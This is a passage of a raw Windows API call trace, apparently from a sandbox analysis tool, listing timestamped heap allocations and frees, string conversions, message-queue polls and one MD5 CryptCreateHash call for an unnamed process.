returned 0x2e50770 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0153.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0153.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0153.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0153.460] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.463] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0153.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0153.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0153.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.464] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0153.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54da8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.465] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0153.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0153.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0153.467] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d78 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 